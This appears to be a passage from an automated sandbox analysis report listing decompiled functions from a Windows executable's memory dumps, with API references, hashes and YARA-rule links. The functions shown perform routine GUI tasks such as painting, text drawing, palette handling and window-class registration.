                                                                        0x0043aa75
                                                                        0x0043aa78
                                                                        0x0043aa7b
                                                                        0x0043aa80
                                                                        0x0043aa87
                                                                        0x00000000
                                                                        0x0043aa96
                                                                        0x0043aa9b

                                                                        APIs
                                                                        • BeginPaint.USER32(00000000,?), ref: 0043A9A2
                                                                        • SaveDC.GDI32(?), ref: 0043A9D6
                                                                        • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 0043AA38
                                                                        • RestoreDC.GDI32(?,?), ref: 0043AA62
                                                                        • EndPaint.USER32(00000000,?,0043AAA3), ref: 0043AA96
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                        • String ID:
                                                                        • API String ID: 3808407030-0
                                                                        • Opcode ID: bcb94933bbd514e23755092639edfe76ed206f93f385ce7b87eca1fef675e24f
                                                                        • Instruction ID: 981de1faad7e270c48b42c82777b4bfcd2244b1cbce74977eaa2f3e787f6203c
                                                                        • Opcode Fuzzy Hash: bcb94933bbd514e23755092639edfe76ed206f93f385ce7b87eca1fef675e24f
                                                                        • Instruction Fuzzy Hash: 70417F71A002049FDB00EF99C984FAEB7F9EF4C304F2590AAE544AB362D7399D51CB19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00467AF0, Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 79%
                                                                        			E00467AF0(void* __ecx, void* __edx, void* __eflags, signed int _a4, char _a8, void* _a12) {
				struct tagRECT _v20;
				void* __edi;
				void* __ebp;
				int _t17;
				CHAR* _t19;
				int _t31;
				CHAR* _t33;
				int _t43;
				CHAR* _t45;
				void* _t49;
				signed int _t56;
				int _t57;
				void* _t61;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t60 = __ecx;
				_t49 = __edx;
				_t56 = _a4;
				E0041FD6C( *((intOrPtr*)(__edx + 0x14)), __ecx, 1, _t56, _t61, __eflags);
				if(_a8 != 1) {
					_t57 = _t56 | 0x00000005;
					__eflags = _t57;
					_t17 = E00404600(__ecx);
					_t19 = E004047F8(__ecx);
					return DrawTextA(E00420730(_t49), _t19, _t17,  &_v20, _t57);
				}
				OffsetRect( &_v20, 1, 1);
				E0041F464( *((intOrPtr*)(_t49 + 0xc)), 0x80000014);
				_t31 = E00404600(_t60);
				_t33 = E004047F8(_t60);
				DrawTextA(E00420730(_t49), _t33, _t31,  &_v20, _t56 | 0x00000005);
				OffsetRect( &_v20, 0xffffffff, 0xffffffff);
				E0041F464( *((intOrPtr*)(_t49 + 0xc)), 0x80000010);
				_t43 = E00404600(_t60);
				_t45 = E004047F8(_t60);
				return DrawTextA(E00420730(_t49), _t45, _t43,  &_v20, _t56 | 0x00000005);
			}
















                                                                        0x00467aff
                                                                        0x00467b00
                                                                        0x00467b01
                                                                        0x00467b02
                                                                        0x00467b03
                                                                        0x00467b05
                                                                        0x00467b07
                                                                        0x00467b0f
                                                                        0x00467b18
                                                                        0x00467ba0
                                                                        0x00467ba0
                                                                        0x00467baa
                                                                        0x00467bb2
                                                                        0x00000000
                                                                        0x00467bc0
                                                                        0x00467b26
                                                                        0x00467b33
                                                                        0x00467b44
                                                                        0x00467b4c
                                                                        0x00467b5a
                                                                        0x00467b67
                                                                        0x00467b74
                                                                        0x00467b83
                                                                        0x00467b8b
                                                                        0x00000000

                                                                        APIs
                                                                        • OffsetRect.USER32(?,00000001,00000001), ref: 00467B26
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00467B5A
                                                                        • OffsetRect.USER32(?,000000FF,000000FF), ref: 00467B67
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00467B99
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00467BC0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: DrawText$OffsetRect
                                                                        • String ID:
                                                                        • API String ID: 1886049697-0
                                                                        • Opcode ID: 517bd8bbddc09e6c71355e403379eb6c13af3cf851ab790c957bc1cec8c4ab7e
                                                                        • Instruction ID: 216688b682b8187a4d0dd2772e2fd5db348bcfabf5300b79facba910a8da82e7
                                                                        • Opcode Fuzzy Hash: 517bd8bbddc09e6c71355e403379eb6c13af3cf851ab790c957bc1cec8c4ab7e
                                                                        • Instruction Fuzzy Hash: 5921A4B1B0412967CB00FB6A9C81E9F72AD9F45328B11053EB918F7282DA7DE80547AD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0045620C, Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0045620C(void* __eax, void* __ecx, struct HWND__** __edx) {
				intOrPtr _t11;
				intOrPtr _t20;
				void* _t30;
				void* _t31;
				void* _t33;
				struct HWND__** _t34;
				struct HWND__* _t35;
				struct HWND__* _t36;

				_t31 = __ecx;
				_t34 = __edx;
				_t33 = __eax;
				_t30 = 0;
				_t11 =  *((intOrPtr*)(__edx + 4));
				if(_t11 < 0x100 || _t11 > 0x108) {
					L16:
					return _t30;
				} else {
					_t35 = GetCapture();
					if(_t35 != 0) {
						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x496714 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
					_t36 =  *_t34;
					_t2 = _t33 + 0x44; // 0x0
					_t20 =  *_t2;
					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
						L7:
						if(E004334C0(_t36, _t31) == 0 && _t36 != 0) {
							_t36 = GetParent(_t36);
							goto L7;
						}
						if(_t36 == 0) {
							_t36 =  *_t34;
						}
						goto L11;
					} else {
						_t36 = E0043CC2C(_t20);
						L11:
						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
				}
			}











                                                                        0x0045620c
                                                                        0x00456210
                                                                        0x00456212
                                                                        0x00456214
                                                                        0x00456216
                                                                        0x0045621e
                                                                        0x004562bd
                                                                        0x004562c3
                                                                        0x0045622f
                                                                        0x00456234
                                                                        0x00456238
                                                                        0x0045629e
                                                                        0x004562bb
                                                                        0x004562bb
                                                                        0x00000000
                                                                        0x0045629e
                                                                        0x0045623a
                                                                        0x0045623c
                                                                        0x0045623c
                                                                        0x00456241
                                                                        0x0045625c
                                                                        0x00456265
                                                                        0x0045625a
                                                                        0x00000000
                                                                        0x0045625a
                                                                        0x0045626d
                                                                        0x0045626f
                                                                        0x0045626f
                                                                        0x00000000
                                                                        0x0045624b
                                                                        0x00456250
                                                                        0x00456271
                                                                        0x0045628a
                                                                        0x0045628c
                                                                        0x0045628c
                                                                        0x00000000
                                                                        0x0045628a
                                                                        0x00456241

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MessageSend$CaptureLongWindow
                                                                        • String ID:
                                                                        • API String ID: 1158686931-0
                                                                        • Opcode ID: 2c61457dadbb28cc4cbfb1fc24bd67136bca18c6d6d1ca2828e17c3f3b137a56
                                                                        • Instruction ID: 5d2c23152084b1fa4b612b1933836b5cb434e24660daf083a54e060d56ea4212
                                                                        • Opcode Fuzzy Hash: 2c61457dadbb28cc4cbfb1fc24bd67136bca18c6d6d1ca2828e17c3f3b137a56
                                                                        • Instruction Fuzzy Hash: 351181712046095FDA20BA99C980E5373DCDB25315F5204BAFD5AD7353EB2DFC084768
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00424C34, Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E00424C34(struct HPALETTE__* __eax) {
				struct HPALETTE__* _t21;
				char _t28;
				signed int _t30;
				struct HPALETTE__* _t36;
				struct HPALETTE__* _t37;
				struct HDC__* _t38;
				intOrPtr _t39;

				_t21 = __eax;
				_t36 = __eax;
				_t39 =  *((intOrPtr*)(__eax + 0x28));
				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
					_t22 =  *((intOrPtr*)(_t39 + 0x14));
					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
						E004235B4(_t22);
					}
					_t21 = E00421218( *((intOrPtr*)(_t39 + 0x14)), 1 <<  *(_t39 + 0x3e));
					_t37 = _t21;
					 *(_t39 + 0x10) = _t37;
					if(_t37 == 0) {
						_push(0);
						L00406EB4();
						_t21 = E00420B28(_t21);
						_t38 = _t21;
						if( *((char*)(_t39 + 0x71)) != 0) {
							L9:
							_t28 = 1;
						} else {
							_push(0xc);
							_push(_t38);
							L00406B8C();
							_push(0xe);
							_push(_t38);
							L00406B8C();
							_t30 = _t21 * _t21;
							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
							if(_t30 < _t21) {
								goto L9;
							} else {
								_t28 = 0;
							}
						}
						 *((char*)(_t39 + 0x71)) = _t28;
						if(_t28 != 0) {
							_t21 = CreateHalftonePalette(_t38);
							 *(_t39 + 0x10) = _t21;
						}
						_push(_t38);
						_push(0);
						L00407124();
						if( *(_t39 + 0x10) == 0) {
							 *((char*)(_t36 + 0x30)) = 1;
							return _t21;
						}
					}
				}
				return _t21;
			}










                                                                        0x00424c34
                                                                        0x00424c38
                                                                        0x00424c3a
                                                                        0x00424c41
                                                                        0x00424c5b
                                                                        0x00424c61
                                                                        0x00424c63
                                                                        0x00424c63
                                                                        0x00424c7a
                                                                        0x00424c7f
                                                                        0x00424c81
                                                                        0x00424c86
                                                                        0x00424c88
                                                                        0x00424c8a
                                                                        0x00424c8f
                                                                        0x00424c94
                                                                        0x00424c9a
                                                                        0x00424cc3
                                                                        0x00424cc3
                                                                        0x00424c9c
                                                                        0x00424c9c
                                                                        0x00424c9e
                                                                        0x00424c9f
                                                                        0x00424ca6
                                                                        0x00424ca8
                                                                        0x00424ca9
                                                                        0x00424cae
                                                                        0x00424cb9
                                                                        0x00424cbd
                                                                        0x00000000
                                                                        0x00424cbf
                                                                        0x00424cbf
                                                                        0x00424cbf
                                                                        0x00424cbd
                                                                        0x00424cc5
                                                                        0x00424cca
                                                                        0x00424ccd
                                                                        0x00424cd2
                                                                        0x00424cd2
                                                                        0x00424cd5
                                                                        0x00424cd6
                                                                        0x00424cd8
                                                                        0x00424ce1
                                                                        0x00424ce3
                                                                        0x00000000
                                                                        0x00424ce3
                                                                        0x00424ce1
                                                                        0x00424c86
                                                                        0x00424ceb

                                                                        APIs
                                                                        • 72E7AC50.USER32(00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424C8A
                                                                        • 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424C9F
                                                                        • 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CA9
                                                                        • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CCD
                                                                        • 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CD8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: B380CreateHalftonePalette
                                                                        • String ID:
                                                                        • API String ID: 178651289-0
                                                                        • Opcode ID: 86355cff44342249c003d187886de4a42cc00f14a0457bd8da80f5da28ea72f8
                                                                        • Instruction ID: b38cbdc5d7d635c132f023a64b9ee6869dab09140c7ce5dbab682903523af89d
                                                                        • Opcode Fuzzy Hash: 86355cff44342249c003d187886de4a42cc00f14a0457bd8da80f5da28ea72f8
                                                                        • Instruction Fuzzy Hash: 8611A2217026799ADB20EF2AE4417EA3AD0EF91359F420126F9009B781D7B89994C3A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00453968, Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 62%
                                                                        			E00453968(void* __eax) {
				void* _t16;
				void* _t37;
				void* _t38;
				signed int _t41;

				_t16 = __eax;
				_t38 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x47aafc != 0) {
					_t16 = E0043CF30(__eax);
					if(_t16 != 0) {
						_t41 = GetWindowLongA(E0043CC2C(_t38), 0xffffffec);
						if( *((char*)(_t38 + 0x2e0)) != 0 ||  *((char*)(_t38 + 0x2e2)) != 0) {
							if((_t41 & 0x00080000) == 0) {
								SetWindowLongA(E0043CC2C(_t38), 0xffffffec, _t41 | 0x00080000);
							}
							return  *0x47aafc(E0043CC2C(_t38),  *((intOrPtr*)(_t38 + 0x2e4)),  *((intOrPtr*)(_t38 + 0x2e1)),  *0x0047AB80 |  *0x0047AB88);
						} else {
							SetWindowLongA(E0043CC2C(_t38), 0xffffffec, _t41 & 0xfff7ffff);
							_push(0x485);
							_push(0);
							_push(0);
							_t37 = E0043CC2C(_t38);
							_push(_t37);
							L004070FC();
							return _t37;
						}
					}
				}
				return _t16;
			}







                                                                        0x00453968
                                                                        0x0045396a
                                                                        0x00453970
                                                                        0x00453985
                                                                        0x0045398c
                                                                        0x004539a1
                                                                        0x004539aa
                                                                        0x004539bb
                                                                        0x004539ce
                                                                        0x004539ce
                                                                        0x00000000
                                                                        0x00453a10
                                                                        0x00453a21
                                                                        0x00453a26
                                                                        0x00453a2b
                                                                        0x00453a2d
                                                                        0x00453a31
                                                                        0x00453a36
                                                                        0x00453a37
                                                                        0x00000000
                                                                        0x00453a37
                                                                        0x004539aa
                                                                        0x0045398c
                                                                        0x00453a3e

                                                                        APIs
                                                                        • GetWindowLongA.USER32 ref: 0045399C
                                                                        • SetWindowLongA.USER32 ref: 004539CE
                                                                        • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,004515D4), ref: 00453A08
                                                                        • SetWindowLongA.USER32 ref: 00453A21
                                                                        • 72E7B330.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,004515D4), ref: 00453A37
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$Long$AttributesB330Layered
                                                                        • String ID:
                                                                        • API String ID: 1770052509-0
                                                                        • Opcode ID: 700f3ffec6371fcf2b6deb768aaa2d0c978f9b693a7dd5c57a867edddd3ceee4
                                                                        • Instruction ID: f4d5327cf6d9d13d20f65eb046940501b950165327f161f479efa226d41080df
                                                                        • Opcode Fuzzy Hash: 700f3ffec6371fcf2b6deb768aaa2d0c978f9b693a7dd5c57a867edddd3ceee4
                                                                        • Instruction Fuzzy Hash: 6911AB60A042902AEB10BE794CC9B4B3A494B09356F142D7ABD99EB2C3C67CCC49C76D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041D31C, Relevance: 7.6, APIs: 5, Instructions: 60registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E0041D31C(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				CHAR* _t14;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;

				_t6 =  *0x496714; // 0x400000
				 *0x47a4d0 = _t6;
				_t8 =  *0x47a4e4; // 0x41d30c
				_t9 =  *0x496714; // 0x400000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L00406D8C != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x496714; // 0x400000
						_t20 =  *0x47a4e4; // 0x41d30c
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x47a4c0);
				}
				_t13 =  *0x496714; // 0x400000
				_t14 =  *0x47a4e4; // 0x41d30c
				_t22 = CreateWindowExA(0x80, _t14, 0x41d3cc, 0x80000000, 0, 0, 0, 0, 0, 0, _t13, 0);
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E0041D260(_a4, _a8));
				}
				return _t22;
			}














                                                                        0x0041d323
                                                                        0x0041d328
                                                                        0x0041d331
                                                                        0x0041d337
                                                                        0x0041d33d
                                                                        0x0041d345
                                                                        0x0041d347
                                                                        0x0041d34a
                                                                        0x0041d358
                                                                        0x0041d35a
                                                                        0x0041d360
                                                                        0x0041d366
                                                                        0x0041d366
                                                                        0x0041d370
                                                                        0x0041d370
                                                                        0x0041d377
                                                                        0x0041d393
                                                                        0x0041d3a3
                                                                        0x0041d3aa
                                                                        0x0041d3bb
                                                                        0x0041d3bb
                                                                        0x0041d3c6

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Class$Window$CreateInfoLongRegisterUnregister
                                                                        • String ID:
                                                                        • API String ID: 3404767174-0
                                                                        • Opcode ID: c05f6195fd41eecf4557a0ad01478a202fa1614434dc745f5eeeea4aa40e0583
                                                                        • Instruction ID: 74b4939fce1307e55b377de450ca8e826035f92d8163aee15a1af6e20c356675
                                                                        • Opcode Fuzzy Hash: c05f6195fd41eecf4557a0ad01478a202fa1614434dc745f5eeeea4aa40e0583
                                                                        • Instruction Fuzzy Hash: 2C0184B1B041046BCB10EBA8DD85F9E33ACE749308F114177FD18E72D1D67AA9948B6E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00421180, Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 40%
                                                                        			E00421180(intOrPtr __eax) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff8;
				_v5 = 0;
				if( *0x496a28 == 0) {
					return _v5;
				} else {
					_push(0);
					L00406EB4();
					_v12 = __eax;
					_push(_t32);
					_push(0x421206);
					_push( *[fs:edx]);
					 *[fs:edx] = _t35;
					_push(0x68);
					_t14 = _v12;
					_push(_t14);
					L00406B8C();
					if(_t14 >= 0x10) {
						_push(__eax + 4);
						_push(8);
						_push(0);
						_t18 =  *0x496a28; // 0xa3080776
						_push(_t18);
						L00406BB4();
						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
						_push(8);
						_push(8);
						_t21 =  *0x496a28; // 0xa3080776
						_push(_t21);
						L00406BB4();
						_v5 = 1;
					}
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(0x42120d);
					_t16 = _v12;
					_push(_t16);
					_push(0);
					L00407124();
					return _t16;
				}
			}













                                                                        0x00421181
                                                                        0x00421183
                                                                        0x00421189
                                                                        0x00421194
                                                                        0x00421214
                                                                        0x00421196
                                                                        0x00421196
                                                                        0x00421198
                                                                        0x0042119d
                                                                        0x004211a2
                                                                        0x004211a3
                                                                        0x004211a8
                                                                        0x004211ab
                                                                        0x004211ae
                                                                        0x004211b0
                                                                        0x004211b3
                                                                        0x004211b4
                                                                        0x004211bc
                                                                        0x004211c1
                                                                        0x004211c2
                                                                        0x004211c4
                                                                        0x004211c6
                                                                        0x004211cb
                                                                        0x004211cc
                                                                        0x004211d9
                                                                        0x004211da
                                                                        0x004211dc
                                                                        0x004211de
                                                                        0x004211e3
                                                                        0x004211e4
                                                                        0x004211e9
                                                                        0x004211e9
                                                                        0x004211ef
                                                                        0x004211f2
                                                                        0x004211f5
                                                                        0x004211fa
                                                                        0x004211fd
                                                                        0x004211fe
                                                                        0x00421200
                                                                        0x00421205
                                                                        0x00421205

                                                                        APIs
                                                                        • 72E7AC50.USER32(00000000), ref: 00421198
                                                                        • 72E7AD70.GDI32(?,00000068,00000000,00421206,?,00000000), ref: 004211B4
                                                                        • 72E7AEA0.GDI32(A3080776,00000000,00000008,?,?,00000068,00000000,00421206,?,00000000), ref: 004211CC
                                                                        • 72E7AEA0.GDI32(A3080776,00000008,00000008,?,A3080776,00000000,00000008,?,?,00000068,00000000,00421206,?,00000000), ref: 004211E4
                                                                        • 72E7B380.USER32(00000000,?,0042120D,00421206,?,00000000), ref: 00421200
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: B380
                                                                        • String ID:
                                                                        • API String ID: 120756276-0
                                                                        • Opcode ID: 79fdbde6109411654c512e7f0f10eb7e6e8b827a2d93cc2535a36f409679effe
                                                                        • Instruction ID: 2e08d2bdc4763a876f0246fa622096bae7d75537cc4679951bf392552e8ebcb6
                                                                        • Opcode Fuzzy Hash: 79fdbde6109411654c512e7f0f10eb7e6e8b827a2d93cc2535a36f409679effe
                                                                        • Instruction Fuzzy Hash: A2110871648344AEEB00CBE59C42F697BECE719714F5180A7F504EA2C1DA7BA454C728
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00462FB4, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 61%
                                                                        			E00462FB4(int __eax) {
				int _v8;
				int _t20;
				int _t22;
				intOrPtr _t29;
				int _t32;
				intOrPtr _t34;
				intOrPtr _t36;

				_t34 = _t36;
				_t22 = __eax;
				if( *((char*)(__eax + 0x2e8)) == 1) {
					return __eax;
				} else {
					_push(0);
					L00406EB4();
					_v8 = __eax;
					_push(_t34);
					_push(0x463039);
					_push( *[fs:eax]);
					 *[fs:eax] = _t36;
					_push(0x48);
					_t11 = _v8;
					L00406B8C();
					_t32 = MulDiv(E0041F6E8( *((intOrPtr*)(__eax + 0x68))), _v8, _t11);
					 *(_t22 + 0x2b0) = _t32;
					E004609B0(_t22, MulDiv(_t32, 0x78, 0x64));
					 *((intOrPtr*)(_t22 + 0x2e4)) =  *((intOrPtr*)(_t22 + 0x234));
					_t29 = 0x5a;
					 *[fs:eax] = _t29;
					_push(0x463040);
					_t20 = _v8;
					_push(_t20);
					_push(0);
					L00407124();
					return _t20;
				}
			}










                                                                        0x00462fb5
                                                                        0x00462fba
                                                                        0x00462fc3
                                                                        0x00463044
                                                                        0x00462fc5
                                                                        0x00462fc5
                                                                        0x00462fc7
                                                                        0x00462fcc
                                                                        0x00462fd1
                                                                        0x00462fd2
                                                                        0x00462fd7
                                                                        0x00462fda
                                                                        0x00462fdd
                                                                        0x00462fe1
                                                                        0x00462fe5
                                                                        0x00462ff9
                                                                        0x00462ffb
                                                                        0x0046300f
                                                                        0x0046301a
                                                                        0x00463022
                                                                        0x00463025
                                                                        0x00463028
                                                                        0x0046302d
                                                                        0x00463030
                                                                        0x00463031
                                                                        0x00463033
                                                                        0x00463038
                                                                        0x00463038

                                                                        APIs
                                                                        • 72E7AC50.USER32(00000000), ref: 00462FC7
                                                                        • 72E7AD70.GDI32(?,0000005A,00000048,00000000,00463039,?,00000000), ref: 00462FE5
                                                                          • Part of subcall function 0041F6E8: MulDiv.KERNEL32(00000000,00000048,?), ref: 0041F6F9
                                                                        • MulDiv.KERNEL32(00000000,00000000,?), ref: 00462FF4
                                                                        • MulDiv.KERNEL32(00000000,00000078,00000064), ref: 00463006
                                                                        • 72E7B380.USER32(00000000,?,00463040,00000000,00000000,?,0000005A,00000048,00000000,00463039,?,00000000), ref: 00463033
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: B380
                                                                        • String ID:
                                                                        • API String ID: 120756276-0
                                                                        • Opcode ID: c8f9a4b56b8d92118ec137326b8e62c1c4f18263f51af8fef2feb35d9f79c448
                                                                        • Instruction ID: 8a975a19c502e7ba5fed77ab0f9ea342d1e76ffa1a8a0f0d302a6746974fb504
                                                                        • Opcode Fuzzy Hash: c8f9a4b56b8d92118ec137326b8e62c1c4f18263f51af8fef2feb35d9f79c448
                                                                        • Instruction Fuzzy Hash: DE01D2717483406FE700EF658C46B5A77DCDB09715F1100B6F908EB2C2DA795D008768
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409C5C, Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 64%
